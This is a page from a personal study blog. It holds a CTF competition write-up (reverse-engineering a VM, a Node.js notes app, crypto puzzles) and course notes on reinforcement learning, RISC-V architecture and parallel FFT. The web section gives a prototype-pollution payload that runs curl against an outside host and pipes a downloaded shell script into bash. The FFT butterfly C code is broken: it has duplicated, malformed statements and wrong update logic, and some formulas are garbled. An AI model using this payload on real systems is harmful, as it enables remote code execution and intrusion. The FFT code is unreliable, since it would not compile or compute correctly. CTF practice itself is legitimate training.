Study 📕 - Page 17 - vickieGPT’s blog

May 11, 2020May 11, 2020

Reflection on our 2020 Wang Ding CTF contest

Result

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get the robots.txt from the nginx website and get the destination.

Play the game with gourgeous names in the CTF conf.

Flag in "F12"

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

not happy, it's a vm inside. From vm_operad, we have

The key is case7, we can apply the diction on a1[v10+1] to figure out what happens. So, up the OD.

Appling the table

int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduct that case 8's to read the user's input, and make the handler as the vector handler in the OS.

the handler can be enumerated as

10h ^ v8[1]-5 = 22h
(20h ^v8[2])*3=3Fh
v8[3]-2-1=34h
(v8[4]+1 )^4 =32 h
v8[5]*3-21h=72h
v8[6]-1-1=33h
9^v8[7]-20=18
(51h +v8[8])^24h=FA7
v8[9]+1-1=31h
2*v8[10]+25h=F1h
(36h+v8[11]) ^41h =28h
(20h + v8[12])*1=F84h
3*v8[13]+25h=C1h
9^v8[14]-20h=1E h
41h + v8[15] +1 =7A h

Eventually we get the total flag{757515121f3d478}.

Web

Notes

get the webshell from the logic in the js.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Apply the "中国菜刀" payloads id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a in the undefsafe.

get the code from /var/html/code/flag

flag{ 8c46c34a-fa1f-4fc9- 81bd- 609b1aafff8a }

Crypto

boom

just play a simple game

md5:en5oy

stupid z=31,y=68, x=74

stupid Mathemetica.

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is to calculate the $m^f\equiv c\ mod\ n$

$n$ is actually $2^512$.

just another Modular arithmetic like "点鞭炮", which can be searched on stackoverflow.

Reflection

We have to practice more and collaborate more!

April 12, 2020February 9, 2022

[RL] RL Category

Following the wikipeadia

Reinforcement Learning is an area of machihne learning inspired by behavioral psychology, concerned with how software agents ought to take actions in an environment so as to maximzie some notion of cumulative reward.

Behavioral Psychology

Behavior is primarily shaped by reinforcement rather than free-will.

behaviors that result in praise/pleasure tend to repeat
behaviors that result in punishment/pain tend to become extinct

agent

An entity (learner & decision maker) that is equipped with Sensors end-effectors and goals

Action

Used by the agent to interact with the environment.
May have many di↵erent temporal granularities and abstractions

reward

A reward R**t is a scalar feedback signal

Indicates how well agent is doing at step t

The agent’s job is to maximize cumulative reward

hypothesis: All goals can be described by the maximization of expected cumulative reward

Main Topics of Reinforcement Learning

Learning: by trial and error

Planning: search, reason, thought, cognition

Prediction: evaluation functions, knowledge

Control: action selection, decision making

Dynamics: how the state changes given the actions of the agent

Model-based RL

dynamics are known or are estimated
solving RL problems that use models and planning

Model-free RL

unknown dynamics
explicitly trial-and-error learners

not necessarily iid

P.S. 逆强化学习。

Summary

April 11, 2020February 9, 2022

[Computer Architecture] superscalar

Greater Instruction-Level Parallelism (ILP)

Multiple issue “superscalar”
- Replicate pipeline stages ⇒ multiple pipelines
- Start multiple instructions per clock cycle – CPI < 1, so use Instructions Per Cycle (IPC)
- E.g., 4GHz 4-way multiple-issue
  - 16 BIPS, peak CPI = 0.25, peak IPC = 4
- But dependencies reduce this in practic
“Out-of-Order” execution
- Reorder instructions dynamically in hardware to reduce impact of hazards
Hyper-threading

Pipelining recap

pipelines complexities exlained

GPRs FPRs

More than one Functional Unit
Floating point execution!
- Fadd & Fmul: fixed number of cycles; > 1
- Fdiv: unknown number of cycles!
Memory access: on Cache miss unknown number of cycles
Issue: Assign instruction to functional unit

summary

Some static multiple issues

VLIW: very long instruction word

The solution can be easily found

Quiz

[ ] A. In-order processors have a CPI >=1

[x] B. more stages allow a higher clock frequency

[x] D. OoO pipleines need speculation

[ ] E. superscalar processor can execute

April 1, 2020February 9, 2022

[Computer Architecture] data path

intro - where are we now?

the cpu

Processor - datapath - control

cenario in RISC-V machine

The datapath and control

Overview

problem: single monolithic bloc
solution: break up the process of excuting an instruction into stages
- smaller stages are easier to design –
- easy to optimize &modularity

five stages

Instruction Fetch
- pc+=4
- take full use of mem hierarchy
Instruction Decode
read the opcode to determine instruction type and field lengths
second, (at the same time!) read in data from all necessary registers
- for add, read two registers
- for addi, read one register
third, generate the immediates
ALU
- the real work of most instructions is done here: arithmetic (+, -, *, /), shifting, logic (&, |)
- For instance, it's load and store
  - lw t0, 40(t1)
  - the address we are accessing in memory = the value in t1 PLUS the value 40
  - so we do this addition in this stage
Mem access
- Actually only the load and store instruction do anything during this stage.
- it's fast but unavoidable
Register write
- write the result of some computation into a register.
- for stores and brances idle
  
  misc
memory alignment

data path elements state and sequencing

instruction level

add

time diagram for add

addi

lw

sw - critical path

combined I+S Immediate generation

branches

pipelining

summary

quiz

for D

for E

March 27, 2020February 9, 2022

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

source:http://www-inst.eecs.berkeley.edu/~cs150/sp13/agenda/

They studied verilog

FSM is really similar to our homework. actually, I found that their exams is given to us for homework.

P.S.: WHY they have spring break?

run a linux on FPGA. and implement a CPU. 俗称“造机”。

If I have time, I'll implement the CPU by my own.

GPU applying the RISC-V architecture will be much better and cooler.

The more I read and learn , the more I found the knowledge in the EECS category can be nicely cascaded. In most of the cases, we get the point from another place and we can be taught within minutes.

After talking with upperclassman 罗浩聪, I guadully find my career as an PhD in Arch or PL, or sth, in between. But for now, let me finish the 2 cooperate papers.

March 26, 2020February 9, 2022

[Computer Architecture] Circuit

intro

synchronous digital systems

Hardware of a processor should be synchronous and digital

The hardware layer of abstraction

switches

arrow shows action if wire changes to 1 or is asserted.

and & or

Transistors

High voltage$V_{dd}$ Low voltage $Gnd$

PWD

we implement switches using CMOS

CMOS Transistor Network

note PWD

material:

how MOSFET Operation

CMOS Networks

2 input network

combined logit symbols

example debugging waveform

types of circuits

example using time chart

March 21, 2020February 9, 2022

[Computer Architechture] call

Language Execution continuum

An interpreter is a program that executes other programs.

langurage translation gives us another option
In genreral, we interpret a high-level language to a lower-level language to increase preformance

interpretation

Python
asm

Assembler directives

pseudo-instruction replacement

what's tail's about

{...
 lots of code
 return foo(y);
}

it's recursive call to foo() if this is within foo(), or call to a different function...
for effictiency
- Evaluate the arguments for foo() in a0-a7
- return ra, all callee saved registers and sp
- Then call foo() with j or tail
when foo() returns, it can return directly to where it needs to return to
- Rather than returning to wherever foo() was called and returning from there
- Tail call optimization

branches

Linking progress

Four types of Address

PC- relative addredding (beq)

Absolute addresses in RISC-V

Loading process

March 19, 2020February 9, 2022

Running a Program - CALL(Compiling, Assembling, Linking, and Loading)

Clarifications

Project 1 RISC-v emulator

Risc-v isa does not define assembly syntax
behave exactly like Venus
All I-Type instructions (including sltiu)
- do sign-extension
- (in venus) input number is signed, even if hex

a good tool

Interpretation

any good reason to interpret machine language in software? debbuger Venus
translated/compiled code almost always more efficitent and therfore higher performance:
- important for many applications, particularly operating systems.

Steps in compiling a C program

Psuedo-instruciton Replacement

Producing Machine Language

simple case
- arithmetic, logical, shifts and so on
- All necessary info is within the instruction already
branches can be optimized

March 19, 2020March 19, 2020

What to care about the bugs in Syscalls

March 17, 2020May 24, 2020

parallel programing 23 parallel fft

One of the most import algorithm in the new century

Intro to the fft

The basic equation of the FFT

$F(\omega)=F|f(t)|=\int ^{+\infty}_{-\infty}f(t)e^{-j\omega t}dt$

Roots of unity

\[
\begin{array}{l}\text { An n'th root of unity is an } \omega \text { s.t. } \ \omega^{n}=1 \text { . } \ \text { There are n roots n'th roots of } \ \text { unity, and they have the form } \ e^{\frac{2 \pi i k}{n}}, \text { for } 0 \leq k \leq n-1 \text { . } \ \text {Write } \omega_{n}=e^{\frac{2 \pi i}{n}} \text { , so that the n'th } \ \text { roots of unity are } \omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1} \end{array}\]

Some problems to differ DT,DFT,FFT,IFFT

They are Fourier Transform, Discrete Fourier Transform, Fast Fourier Transform and Inverse Fourier Transform.
The transform factor:
$\text { Fact } 1 \omega_{n}^{n}=1 \text { . } \ \text { Fact } 2 \omega_{n}^{k+\frac{n}{2}}=-\omega_{n}^{k} \ \text { Fact } 3\left(\omega_{n}^{k}\right)^{2}=\omega_{n}^{2 k}=\omega_{n / 2}^{k}$

Why we should have the DFT.
Because in theory, all the data stored in computer is Discrete. So we have to use the equation $X(k)=\sum^{N-1}_0x(n)W^{kn}_N(k\in \mathbb{N})$

The Transform factor is used to prove the
1) Periodicity
$W_{N}^{m+l N}=W_{N}^{m},$\) where $\(: W_{N}^{-m}=W_{N}^{N-m}$
2) Symmetry
$W_{N}^{m+\frac{N}{2}}=-W_{N}^{m}$
3) Contractability
$W_{N / m}^{k}=W_{N}^{m k}$
4) Special rotation factors
$W_{N}^{0}=1$

Why Fourier Fast Algorithm (aka FFT)?

FFT is a DFT-based algorithm designed to accelerate the computational speed of DFT.

Given a degree $n$ -1 polynomial
$A(x)=a_{0}+a_{1} x+a_{2} x^{2}+\dots+a_{n-1} x^{n-1}$
DFT computes $A\left(\omega_{n}^{0}\right), A\left(\omega_{n}^{1}\right), \ldots, A\left(\omega_{n}^{n-1}\right)$
since $A(x)=a_{0}+x\left(a_{1}+x\left(a_{2}+\cdots\right) \ldots\right)$
$A(x)$ can be evaluated in $\mathrm{O}(\mathrm{n})$ time and
$\mathrm{O}(1)$ memory.

DFT can be computed trivially in $\mathrm{O}\left(\mathrm{n}^{2}\right)$
time.

For the DFT formula computer implementation the complexity is o(N²), while the complexity by FFT calculation is reduced to: N×log2(N)

What is the sequence split extraction in FFT?

The sequence splitting process of FFT is the extraction process, which is divided into: extraction by time and extraction by frequency.

1) Extraction by time (also called parity extraction)

2) Frequency, which we don’t apply here.

How does FFT reduce the amount of computation?

In simple terms, mathematicians use the above mentioned properties of the rotation factor W such as periodicity, symmetry, etc. to simplify the formula. In algorithmic programming, new points are constantly counted using points that have already been counted, i.e., old points count new points.

Theoretically, FFT computes the DFT in O(n log n) time using divide and conquer.
\square Suppose n is a power of 2.
Let $A^{[0]}=a_{0}+a_{2} x^{1}+a_{4} x^{2}+\cdots+a_{n-2} x^{\frac{n}{2}-1}$
$A^{[1]}=a_{1}+a_{3} x^{1}+a_{5} x^{2}+\cdots+a_{n-1} x^{\frac{n}{2}-1}$
Then $A(x)=A^{[0]}\left(x^{2}\right)+x A^{[1]}\left(x^{2}\right)$.
So can compute $A\left(\omega_{n}^{0}\right), A\left(\omega_{n}^{1}\right), \ldots, A\left(\omega_{n}^{n-1}\right)$ by computing $A^{[0]}$ and $A^{[1]}$
at $\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n-1}\right)^{2}$, and multiplying some terms by
$\omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1}$.
But $\left(\omega_{n}^{k+n / 2}\right)^{2}=\omega_{n}^{2 k+n}=\omega_{n}^{2 k}=\left(\omega_{n}^{k}\right)^{2}$ by Fact 1.
A So $\left\{\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n-1}\right)^{2}\right\}=\left\{\left(\omega_{n}^{0}\right)^{2},\left(\omega_{n}^{1}\right)^{2}, \ldots,\left(\omega_{n}^{n / 2-1}\right)^{2}\right\},$ i.e. only need
to evaluate $A^{[0]}$ and $A^{[1]}$ at n/2 points instead of n.
Also, $\left(\omega_{n}^{k}\right)^{2}=\omega_{n}^{2 k}=\omega_{n / 2}^{k}$

Note: Simply splitting a multipoint sequence into a less point sequence without simplification is not a reduction in arithmetic volume!!! Splitting is only in the service of simplification, using the spin factor is the key to arithmetic reduction!!!

Time Complexity:
Thus, computing $A(x)=A^{[0]}\left(x^{2}\right)+x A^{[1]}\left(x^{2}\right)$ for
$x \in\left\{\omega_{n}^{0}, \omega_{n}^{1}, \ldots, \omega_{n}^{n-1}\right\}$ requires
$\square$ Computing for $A^{[0]}(x)$ and $A^{[1]}(x)$ for $x \in$
$\left\{\omega_{n / 2}^{0}, \omega_{n / 2}^{1}, \ldots, \omega_{n / 2}^{n / 2-1}\right\}$

These are also DFT’s, so can be done recursively using two
n/2-point FFT’s.
\square For $0 \leq k \leq \frac{n}{2}-1$
\[
\begin{array}{l}\qquad A\left(\omega_{n}^{k}\right)=A^{[0]}\left(\omega_{n / 2}^{k}\right)+\omega_{n}^{k} A^{[1]}\left(\omega_{n / 2}^{k}\right) \ \begin{array}{l}\qquad A\left(\omega_{n}^{k+n / 2}\right)=A^{[0]}\left(\omega_{n / 2}^{k+n / 2}\right)+\omega_{n}^{k+n / 2} A^{[1]}\left(\omega_{n / 2}^{k+n / 2}\right) \ =A^{[0]}\left(\omega_{n / 2}^{k}\right)-\omega_{n}^{k} A^{[1]}\left(\omega_{n / 2}^{k}\right)\end{array}\end{array}
\]

Butterfly operation?

For a butterfly operation, you can understand it as an operation that is customizable by a graph.

The left side is the input and the right side is the output, for the letters on the horizontal line there are two cases.

1) A number on the left end line (none means C and D are 1).

2)The right end lines have the numerical representation, but if none, C & D are 0s.

The FFT takes out odd and even in accordance to time to change the original sequence. which have to sequentialize it to make the algorithm meet the required sequence. The new sequence is the reverse binary sequence of the original ones.

For example $(a_0 a_4 a_2 a_6 a_1 a_5 a_3 a_7)$ have the binary sequence $(000，100，010，110，001，101，011，111)$.
The reverse order can be simply treated as the change of 2 near binary number, which in this case is:$（a_0 a_1 a_2 a_3 a_4 a_5 a_6 a_7）$;

Which is $(000，001，010，011，100，101，110，111)—>(000，100，010，110，001，101，011，111)$.

The code for this transformation:

for(I=0;I<N;I++) // According to law 4, you need to perform inter-code inverse order for all elements of the array
{  
  /* Get the value of the inverse J of subscript I*/ 
  J=0;
  for(k=0;k<(M/2+0.5);k++) //k indicates operation
     {
        /* Reverse sequence operation*/
        m=1;//m is a binary number with a minimum of 1
        n=(unsigned int)pow(2,M-1);//n is a binary number with the Mth degree of 1.
        m <<= k; // for m move left k
        n>>= k; //shift k bits to the right of n
        F0=I & n;//I & n by the kth position of the first half of the extracted
        F1=I & m;//I with m-pressure bit corresponding to the lower part of the second half of the extracted F0
        if(F0) J=J | m; //J and m are in position or so that F0 corresponds to a low position of 1
        if(F1) J=J | n; //J and n are in the same position or so that F1 corresponds to a high level of 1
     }
   if(I<J)
    {
      Temp=A[I];
      A[I] =A[J];
      A[J]=Temp;
    }                                
}

The butter fly operation:
Now let’s imagine that if we want to program the FFT algorithm, the most basic implementation of the FFT algorithm is the butterfly operation, for any butterfly such as.

When N=8.

As can be seen from the above figure, to perform the butterfly operation, we have to solve the following problems.

Interval B between two input data
Determination of the rotation factor W, including.
- Determination of the L-level rotation index P.
- Determination of the type of Level L W.
- The interval between the same W in level L.

$\left\{\begin{array}{l}T_{R}=X_{R}(\mathrm{j}+B) \cos \frac{2 \pi}{N} p+X_{I}(j+B) \sin \frac{2 \pi}{N} p \cdots(1) \ T_{\mathrm{I}}=X_{I}(j+B) \cos \frac{2 \pi}{N} p-X_{R}(j+B) \sin \frac{2 \pi}{N} p \cdots(2) \ \mathrm{A}_{\mathrm{R}}(\mathrm{j})=X_{R}(\mathrm{j})+T_{R} \ \mathrm{A}_{\mathrm{I}}(\mathrm{j})=X_{I}(\mathrm{j})+T_{\mathrm{I}} \ \mathrm{A}_{\mathrm{R}}(\mathrm{j}+\mathrm{B})=X_{R}(\mathrm{j})-T_{R}(5) \ \mathrm{A}_{\mathrm{I}}(\mathrm{j}+\mathrm{B})=X_{I}(\mathrm{j})-T_{\mathrm{I}}(6)\end{array}\right.$

for(L=1; L<=M;L++) //FFT butterfly level L from 1--M
{  
  /* L-level operations*/  
  //First calculate the interval B = 2^(L-1);
  B = 1;
  B = (int)pow(2,L-1);
  for(j=0; j<=B-1;j++)
  {
    /* Homogeneous butterfly operation*/  
    // First increment k=2^(M-L)
    k = (int)pow(2,M-L);
    // Calculate the rotation index p in increments of k, then p = j*k
    P=1;
    P=j*k;
    for(i=0; i<=k-1;i++)
    {
      /* Perform butterfly operations*/
      //Array calibrated to r
      r=1;
      r=j+2*B*i;
      Tr=dataR[r+B]*cos(2.0*PI*p/N) + dataI[r+B]*sin(2.0*PI*p/N);
      Ti=dataI[r+B]*cos(2.0*PI*p/N) - dataR[r+B]*sin(2.0*PI*p/N);
      dataR[r+B]=dataR[r]-Tr;
      dataI[r+B]=dataI[r]-Ti;
      dataR[r]=dataR[r]-Tr; dataI[r+B]=dataI[r]-Ti; dataI[r]-Ti; dataR[r]=dataR[r]+Tr;
      dataI[r]=dataI[r]]+Ti;
    }
  }
}

IFFT is the reverse of the above operation.

What if we take it on the mesh or hypercube to make it scalable on gpu oprations?

Hpercube:

Consider the binary exchange algorithm on a hypercube architecture.
Each processor connected to d others, which differ in each digit of ID.
- Communication only with neighbors, send n/p values each time.
- since d = log p rounds of communication, communication time $T_{c}=$ $t_{s} \log p+t_{w} \frac{7}{p} \log p .$
Each stage does n/p computation.
- Total computation time $T_{p}=\frac{t_{c} n}{p} \log n$.
Efficiency is $E=\frac{T_{p}}{T_{p}+T_{c}}=1 /\left(1+\frac{t_{s} p \log p}{t_{c} n \log n}+\frac{t_{w} \log p}{t_{c} \log n}\right)$
Define $K$ such that $E=1 /(1+1 / K) .$
For isoefficiency, want last two terms in denominator to be constant.
$\frac{t_{s} p \log p}{t_{c} n \log n}=\frac{1}{K}$ implies $n \log n=W=K \frac{t_{s}}{t_{c}} p \log p .$
$\frac{t_{w} \log p}{t_{c} \log n}=\frac{1}{K}$ implies $\log n=K_{t_{c}}^{t_{w}} \log p,$ so $n=p^{K t_{w} / t_{c}},$ so
$W=K \frac{t_{w}}{t_{c}} p^{K t_{w} / t_{c}} \log p$

The efficiency for this case depends on $t_c,t_s,t_w$, the wait time is the tradeoffs between two different lines. which is:

From the Efficiency law
, we have once $\frac{Kt_w}{t_c}>1$, the increasing time is polynomial with regard to the processor count.

Mese:

2D transpose FFT: The best:

Reference

Prof Fan’s PPT
Implement FFT in C by GoKing
Implement FFT on QPU rpi3b+ by Andrew Holme

Result

Misc

qiandao

Reverse

signal

Web

Notes

Crypto

boom

You Raise Me up

Reflection

Behavioral Psychology

agent

Action

reward

Main Topics of Reinforcement Learning

Summary

Greater Instruction-Level Parallelism (ILP)

Pipelining recap

pipelines complexities exlained

GPRs FPRs

summary

Some static multiple issues

VLIW: very long instruction word

Quiz

intro - where are we now?

the cpu

cenario in RISC-V machine

The datapath and control

Overview

five stages

misc

memory alignment

data path elements state and sequencing

instruction level

add

time diagram for add

addi

lw

sw - critical path

combined I+S Immediate generation

branches

pipelining

summary

quiz

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

intro

synchronous digital systems

switches

Transistors

CMOS Transistor Network

how MOSFET Operation

CMOS Networks

2 input network

combined logit symbols

example debugging waveform

types of circuits

example using time chart

Language Execution continuum

interpretation

Assembler directives

pseudo-instruction replacement

what's tail's about

branches

Linking progress

Four types of Address

Absolute addresses in RISC-V

Loading process

Clarifications

Project 1 RISC-v emulator

Interpretation

Steps in compiling a C program

Psuedo-instruciton Replacement

Producing Machine Language

One of the most import algorithm in the new century

Intro to the fft

The basic equation of the FFT

Roots of unity

Some problems to differ DT,DFT,FFT,IFFT

Reference